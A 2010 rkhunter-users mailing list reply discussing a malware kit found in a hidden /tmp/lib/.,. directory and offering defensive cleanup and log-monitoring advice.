On Wed, 16 Jun 2010 19:02:38 +0200 Udo Rader <udo.ra...@bestsolution.at> wrote: >ok, I see you already have met the kit in question ;-)
Seen this malware a couple of times, yes. >From what I see, there is not much difference between the two >infections, except maybe that I only see 23 files (instead of the 25) File count depends on the package and if it ran previously but contents will mostly be the same: scanner, flooder, bot and maybe a simple process hider. >and maybe that the kit was installed in /tmp/lib. In there it was >further hidden inside a ".,." directory, giving /tmp/lib/.,. > >Maybe just something to be added to "suspicious directories". Not necessary as 'suspscan' will pick it up fine as long as you provide directory names where processes may write temporary files. BTW running 'suspscan' is only a *postmortem* action and finding the malware only an *indication* of more serious problems. It would be good to (first make backups, weed out problematic scripts or installations, update software to current and then) harden the web stack and run say 'Logwatch' (and extending Logwatch capabilities to include common downloaders is quite easy: http://www.linuxquestions.org/questions/blog/unspawn-2450/logwatch- webserver-logs-php-malarky-2308/). HTH, unSpawn -- ------------------------------------------------------------------------------ ThinkGeek and WIRED's GeekDad team up for the Ultimate GeekDad Father's Day Giveaway. ONE MASSIVE PRIZE to the lucky parental unit. See the prize list and enter to win: http://p.sf.net/sfu/thinkgeek-promo _______________________________________________ Rkhunter-users mailing list Rkhunter-users@lists.sourceforge.net https://lists.sourceforge.net/lists/listinfo/rkhunter-users
